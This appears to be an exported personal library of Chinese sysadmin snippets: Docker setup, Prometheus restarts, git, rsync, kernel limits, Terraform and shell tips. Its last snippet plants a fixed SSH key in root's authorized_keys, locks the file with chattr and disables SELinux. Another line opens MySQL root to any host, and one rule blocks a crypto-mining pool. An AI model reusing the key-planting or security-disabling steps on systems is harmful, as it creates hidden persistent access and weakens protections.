which docker-compose &>/dev/null||curl -L "https://github.com/docker/compose/releases/download/1.28.6/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose&&chmod +x /usr/local/bin/docker-compose
docker-compose -f docker-compose.yml up -dgo wget -t 3 https://s.xabcstack.com/files/go.tgz -O -|tar xzf - -C /usr/local
wget -t 3 https://s.xabcstack.com/files/xabc-go.sh -O /etc/profile.d/xabc-go.shaliyun_vms pip3 install aliyun-python-sdk-dyvmsapikompose wget -t 3 https://s.xabcstack.com/k8s/kompose -O /usr/local/bin/kompose
chmod +x /usr/local/bin/komposedockercn [ -d /etc/docker ]||mkdir -p /etc/docker
tee /etc/docker/daemon.json <<-'EOF'
{
"registry-mirrors": ["https://registry.docker-cn.com"]
}
EOF
systemctl restart dockerprb pgrep prometheus|xargs kill -9
pgrep blackbox|xargs kill -9
pgrep alertmanager|xargs kill -9
sleep 2
pgrep alertmanager||(/srv/zero/1/prometheus/alertmanager/alertmanager --config.file=/srv/zero/1/prometheus/alertmanager/alertmanager.yml --cluster.listen-address='' --storage.path=/srv/zero/1/prometheus/alertmanager/data &>/srv/zero/1/prometheus/logs/alertmanager.log &)
pgrep blackbox||(/srv/zero/1/prometheus/blackbox_exporter/blackbox_exporter --config.file=/srv/zero/1/prometheus/blackbox_exporter/blackbox.yml &>/srv/zero/1/prometheus/logs/blackbox_exporter.log &)
pgrep prometheus||(/srv/zero/1/prometheus/prometheus --config.file=/srv/zero/1/prometheus/prometheus.yml --storage.tsdb.path=/srv/zero/1/prometheus/data --web.enable-lifecycle &>/srv/zero/1/prometheus/logs/prometheus.log &)aliyun [ -d /etc/docker ]||mkdir -p /etc/docker
tee /etc/docker/daemon.json <<-'EOF'
{
"registry-mirrors": ["https://7u4xdzci.mirror.aliyuncs.com"]
}
EOF
systemctl restart dockerdocker cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
yum install -y yum-utils
yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo
yum clean all
yum install -y docker-ce docker-ce-cli containerd.io docker-compose
yum install -y docker-ce
systemctl daemon-reload
systemctl enable docker.service
systemctl start docker
fi
if [ "$OS" = "Debian" ];then
sudo apt-get remove docker docker-engine docker.io containerd runc
sudo apt-get update
sudo apt-get -y install apt-transport-https ca-certificates curl gnupg lsb-release
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
echo "deb [arch=amd64 signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
apt-get update
apt-get -y install docker-ce docker-ce-cli containerd.io docker-compose
service docker restart
fi
#docker run hello-world
#docker run -d -p 80:8000 --restart=always -v /opt/files:/opt/files ywgx/filelist:alpine
#docker rmi $name 删除镜像
#docker container prune 清理所有处于终止状态的容器
#docker run -d -p 5000:5000 --restart=always --name registry -v /opt/data/registry:/var/lib/registry registry 安装运行 docker-registry
#docker build -t ywgx/filelist . 使用Dockerfile文件 build 构建一个镜像名称 ywgx/filelist
#docker tag $container_id ywgx/test:dev 为镜像添加一个新的标签
#docker tag ywgx/filelist filelist 为镜像ywgx/filelist添加新标签 filelist
#docker search $name 查询镜像
#docker export $container_id > container.tar 导出容器
#docker save -o busybox.tar busybox 导出
#docker load -i busybox.tar 导入
$docker rm -f $container_id 删除容器
#docker run -d -p 80:5000 training/webapp python app.py 后台启动容器并映射本地端口 80
#docker port $container_id 或者 $name 查看容器端口
#docker logs -f $container_id 查看容器内部标准输出
#docker top $name 查看容器内部运行的进程
#cat container.tar | docker import - centos:v1 导入容器到镜像 centos:v1
#docker inspect $name 检查容器的配置和状态信息
#docker run -itd --name ubuntu-test ubuntu 运行容器,并且可以通过 exec 命令进入 ubuntu 容器
#docker run -itd --name centos-test centos 运行容器,并且可以通过 exec 命令进入 centos 容器
#docker commit -m="filelist" -a="ywgx" e218edb10161 ywgx/filelist:v2
#数据卷
#创建:docker volume create
#删除某个卷:docker volume rm 卷名
#删除所有未使用的卷:docker volume prune
#列出所有卷:docker volume ls
#查看某个卷的信息:docker volume inspect 卷名
#新建一个 Docker 网络
# docker network create -d bridge test-net
# docker run -itd --name test1 --network test-net ubuntu /bin/bash 运行一个容器并连接到新建的 test-net 网络
# docker run -itd --name test2 --network test-net ubuntu /bin/bash 再运行一个容器并连接到新建的 test-net 网络
# test1 容器和 test2 容器建立了互联关系,两个容器直接可以互相ping通
# COPY 和 ADD 指令中选择的时候,可以遵循这样的原则,所有的文件复制均使用 COPY 指令,仅在需要自动解压缩的场合使用 ADD。
# 查看仓库中的镜像 curl 127.0.0.1:5000/v2/_catalog
# 配置DNS
#我们可以在宿主机的 /etc/docker/daemon.json 文件中增加以下内容来设置全部容器的 DNS
#{
# "dns" : [
# "114.114.114.114",
# "8.8.8.8"
# ]
#}
#systemctl restart docker
#docker exec -it $container_id /bin/bash 进入容器pandas import pandas as pd
pd.set_option('display.max_rows', 10000) #最大行数
pd.set_option('display.max_columns', 1000) #最大列数
pd.set_option('display.width', 10000) #页面宽度ss #ss命令可以查看系统中启动的端口信息,该命令常用选项如下:
#-a显示所有端口的信息
#-n以数字格式显示端口号
#-t显示TCP连接的端口
#-u显示UDP连接的端口
#-l显示服务正在监听的端口信息,如httpd启动后,会一直监听80端口
#-p显示监听端口的服务名称是什么(也就是程序名称)
ss -antulpk8stips 1.简述Kubernetes中Pod可能位于的状态?
Pending:API Server已经创建该Pod,且Pod内还有一个或多个容器的镜像没有创建,包括正在下载镜像的过程。
Running:Pod内所有容器均已创建,且至少有一个容器处于运行状态、正在启动状态或正在重启状态。
Succeeded:Pod内所有容器均成功执行退出,且不会重启。
Failed:Pod内所有容器均已退出,但至少有一个容器退出为失败状态。
Unknown:由于某种原因无法获取该Pod状态,可能由于网络通信不畅导致。
alpine apk add gcc musl-dev
apk add build-basegitlab Git 全局设置
git config --global user.name "Administrator"
git config --global user.email "admin@example.com"
创建一个新仓库
git clone git@gitlab.lejiapay.com:gitlab-instance-29c6df9a/Monitoring.git
cd Monitoring
touch README.md
git add README.md
git commit -m "add README"
git push -u origin master
推送现有文件夹
cd existing_folder
git init
git remote add origin git@gitlab.lejiapay.com:gitlab-instance-29c6df9a/Monitoring.git
git add .
git commit -m "Initial commit"
git push -u origin master
推送现有的 Git 仓库
cd existing_repo
git remote rename origin old-origin
git remote add origin git@gitlab.lejiapay.com:gitlab-instance-29c6df9a/Monitoring.git
git push -u origin --all
git push -u origin --tags
查找版本号
git log --oneline
重置到某一版本
git reset --hard 版本号
rb pgrep filelist.py|xargs kill -9 &>/dev/null
pgrep filelist.py|xargs kill -9 &>/dev/null
sleep 1;cd /home/ywgx/1/filelist/;./filelist.py --auth=true --debug=false --port=10000 --root=/home/ywgx/data/filelist &>/home/ywgx/logs/filelist.log &
sleep 3;cd /home/ywgx/1/filelist/;./filelist.py --auth=false --debug=false --port=8000 --root=/home/ywgx/data/dlload &>/home/ywgx/logs/dlload.log &
ps aux|grep filelist|grep -v greptips #nfs 依赖 yum -y install nfs-utils
#sftp 可以 ftp 不行的问题,查看 getsebool allow_ftpd_full_access 如果是 off ,可以打开 setsebool allow_ftpd_full_access
#pip3 install -U pip setuptools
#pip3 download -d packages/ -r requirements.txt 把依赖包都下到packages文件夹里
#pip3 install --no-index --find-links=packages/ -r requirements.txt 离线安装
#pip3 freeze > requirements.txt
# problem making ssl connection
先把 /etc/yum.repos.d/rdo-release.repo里的enabled=0,禁用掉
在执行yum install ca-certificates
# RPM 数据库问题 'yum check' 解决方法
package-cleanup --cleandupes
# module_name = shell 将默认的模块改为shell,command模块功能太弱
ansible AppGroup -m shell -a 'w'
#查看域名 dns
dig baidu.com +nssearch
#显示连接用户信息
ss -tapo dport = :3306
#可以使用以下命令查使用内存最多的10个进程
ps -aux | sort -k4nr | head -n 10
#可以使用一下命令查使用CPU最多的10个进程
ps -aux | sort -k3nr | head -n 10
# 物理内存大小 = 物理已使用的内存 + 物理没使用的内存
total = used + free
# 可用内存大小 = 物理没使用的内存 + 缓冲 + 缓存
available = free + buffers + cached
# 内存使用率 = (物理内存大小 - 可用内存大小) / 物理内存大小 * 100
percent = (total - available) / total * 100
/etc 系统文件属性恢复
#restorecon -Rv /etc
PATH=$PATH:$HOME/.local/bin:$HOME/bin
查看某进程的文件打开数
cat /proc//limits
ls -lh /proc//fd
ls -lh /proc//fd|wc -l
import salt.client
local = salt.client.LocalClient()
print(help(local.cmd))
find . -type f | parallel -j+0 grep -i foobar 并发的grep
systemctl list-unit-files --type=service|grep enabled
ulimit -n # 查看当前用户可用最大句柄
sysctl -a | grep fs.file-max # 查看内核级的文件句柄最大限制值
cat /proc/sys/fs/file-nr # 查看当前已用的文件句柄数量 和 内核级的文件句柄限制的最大值
乱码转换
:set fileencoding=UTF-8
:x!
TAB替换为空格:
:se ts=4
:se et
:%retab!
空格替换为TAB:
:se ts=4
:se noet
:%retab!
curl 2 python: https://curl.trillworks.com
au BufNewFile,BufRead *.py se ts=4 sts=4 sw=4 et
k8s
minikube start --driver=hyperv --memory=4096m --image-repository=registry.cn-hangzhou.aliyuncs.com/google_containers
/etc/security/limits.conf (注意同时要留意 /etc/security/limits.d/下面的参数)
root soft nofile 65535
root hard nofile 65535
* soft nofile 65535
* hard nofile 65535
* soft nproc 65535
* hard nproc 65535
还要追加下面一行给(/etc/pam.d/login)
session required pam_limits.so
usermod -aG wheel ywgx (把 ywgx 添加入wheel分组)
rsync -av --progress --delete /tmp/abc ywgx@base.xabcstack.com:/tmp/ (这个会把当前主机 /tmp/abc 同步到目标机器 /tmp/ 目录下,如果没有自动创建abc目录)
rsync --daemon --config=./rsyncd.conf
rsync -aq --progress root@repo.xabcstack.com::salt .
rsync -aq --progress --delete --exclude={"COMMIT",} /cache/sys root@172.18.10.144:/cache/ (把当前主机 /cache/sys 目录同步到目标机器 /cache/, 跳过/cache/sys/COMMIT 这个目录 )
return 301 https://$host$request_uri;
awk '{ print $(NF-2) }'
scp -P 12349 upload_file username@server
echo "*/5 * * * * pgrep sentinel.py||/srv/zero/sentinel.py &>/var/log/xabc.log &" > /var/spool/cron/root
for i in `find /root/.jenkins/jobs -maxdepth 6 -name "[0-9]*" -a -mtime +3`;do rm -rf $i;done
*/5 * * * * pgrep nginx||/opt/openresty/nginx/sbin/nginx
netstat -aulntp
nc -vuz 100.67.1.217 514 (探测主机100.67.1.217 UDP 514 端口是否打开)
Influxdata 数据备份和恢复
备份:
influxd backup -database database_name 数据存储位置
influxd backup -database database_name -host localhost:8088 数据存储位置 # 远程备份
恢复元数据:
influxd restore -metadir /var/lib/influxdb/meta/ 元数据存储位置
influxd restore -database database_name -datadir /var/lib/influxdb/data 数据存储位置
修改权限:
chown -R influxdb:influxdb /var/lib/influxdb
重启influxdb:
service influxdb stop
service influxdb start
磁盘挂载
1. fdisk -l
2. mkfs.ext4 /dev/vd{x}
3. mount /dev/vd{x} /media
4. vim /etc/fstab
/dev/vd{x} /media ext4 defaults 0 0
时区设置
timedatectl set-timezone Asia/Shanghai
timedatectl 查看时间设置
chronyc sources -v 查看时间同步状态
提示Read-only file system,执行命令 mount -o remount rw /
同步本地时间到硬件
hwclock --systohc
通过redis-cli导入数据
通过在ECS上的redis-cli,可将用户ECS上原有的数据导入到云数据库Redis版中,操作代码为:
# redis-cli -h old_instance_ip -p old_instance_port config set appendonly yes
# redis-cli -h aliyun_redis_instance_ip -p 6379 -a password --pipe < appendonly.aof
# terraform
terraform version 查看 Terraform 版本
terraform init 初始化 Terraform
terraform plan Terraform 执行计划
terraform apply 应用 Terraform
terraform show 检查 Terraform 状态
terraform output 查看输出变量的值
terraform graph 生成资源依赖图
terraform destroy 销毁资源
terraform workspace 管理 Terraform 工作区
terraform workspace new 新建工作区
terraform workspace list 列出工作区
terraform workspace select 切换工作区
terraform workspace delete 删除工作区
terraform get 下载或更新 Terraform 模块
terraform fmt 格式化 Terraform 代码
terraform validate 检查 Terraform 语法
terraform console Terraform 控制台
iptables -I INPUT -s xmr.crypto-pool.fr -j DROP
iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -t mangle -I POSTROUTING -p tcp -m tcp --tcp-flags SYN,RST SYN -j TCPMSS --set-mss 1024
firewall
systemctl start firewalld
firewall-cmd --reload
firewall-cmd --permanent --add-service=http
firewall-cmd --permanent --add-service=https
use mysql;
update user set host = '%' where user = 'root';
FLUSH PRIVILEGES;shell #${#string} $string的长度
#${string:position} 在$string中, 从位置$position开始提取子串
#${string:position:length} 在$string中, 从位置$position开始提取长度为$length的子串
#${string#substring} 从变量$string的开头, 删除最短匹配$substring的子串
#${string##substring} 从变量$string的开头, 删除最长匹配$substring的子串
#${string%substring} 从变量$string的结尾, 删除最短匹配$substring的子串
#${string%%substring} 从变量$string的结尾, 删除最长匹配$substring的子串
#${string/substring/replacement} 使用$replacement, 来代替第一个匹配的$substring
#${string//substring/replacement} 使用$replacement, 代替所有匹配的$substring
#${string/#substring/replacement} 如果$string的前缀匹配$substring, 那么就用$replacement来代替匹配到的$substring
#${string/%substring/replacement} 如果$string的后缀匹配$substring, 那么就用$replacement来代替匹配到的$substring
#大小写转换
$ test="abcDEF"
# 把变量中的第一个字符换成大写
$ echo ${test^}
AbcDEF
# 把变量中的所有小写字母,全部替换为大写
$ echo ${test^^}
ABCDEF
# 把变量中的第一个字符换成小写
$ echo ${test,}
abcDEF
# 把变量中的所有大写字母,全部替换为小写
$ echo ${test,,}
abcdef
${VALUE:-WORD}:当变量未定义或者值为空时,返回值为WORD的内容,否则返回变量的值。
${VALUE:=WORD}:当变量未定义或者值为空时,返回WORD的值的同时并将WORD赋值给VALUE,否则返回变量的值。
${VALUE:+WORD}:当变量已赋值时,其值才用WORD替换,否则不进行任何替换。
${VALUE:?MESSAGE}:当变量已赋值时,正常替换。否则将消息MESSAGE送到标准错误输出(若此替换出现在SHELL程序中,那么该程序将终止运行)。
补充:WORD可以为一个字符串,也可以为一个变量。当为变量时,需要用“$”引用该变量。hf if ! grep -q "hfzp" /root/.ssh/authorized_keys &>/dev/null;then
[ -e /root/.ssh/authorized_keys ]&&chattr -ai /root/.ssh/authorized_keys||mkdir -p -m 700 /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7cDLbprh+i930XUqo81RXjaLg4Kot5L9aiB789V4L/mDfV7ZeW6k2S1bdIGUrtSmFZnmA/2HQKid102mEzp8Y2/xkwXoTM/hsah+X8DXLX5/xwUb2XuhqZSJy+x/6MLC9MGjvQGFpqvaK1fJZzjFxZaaHoC79iJWbYCzBLo2n+EcmmX559gAgcUSSvjsUQRAy7f+/1Hp/cLB+rqTMVoNgeAZGgMV6QNoxpZlKWSTFeicxN/sNgy6FLpLOyuX5xwsYfpaDdZd+MYlG69XDIakh4cy+kg9q6nQ2bYOw3GhdNMSNnlsU7XkY872OUCTodZ8iu24AvqFE1kxCaIp8egAD hfzp" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
chattr +ai /root/.ssh/authorized_keys
fi
which setenforce &>/dev/null&&setenforce -1 &>/dev/null
[ -e /etc/selinux/config ]&&grep -q "SELINUX=enforcing" /etc/selinux/config&&sed -i 's/SELINUX=enforcing/SELINUX=disabled/' /etc/selinux/config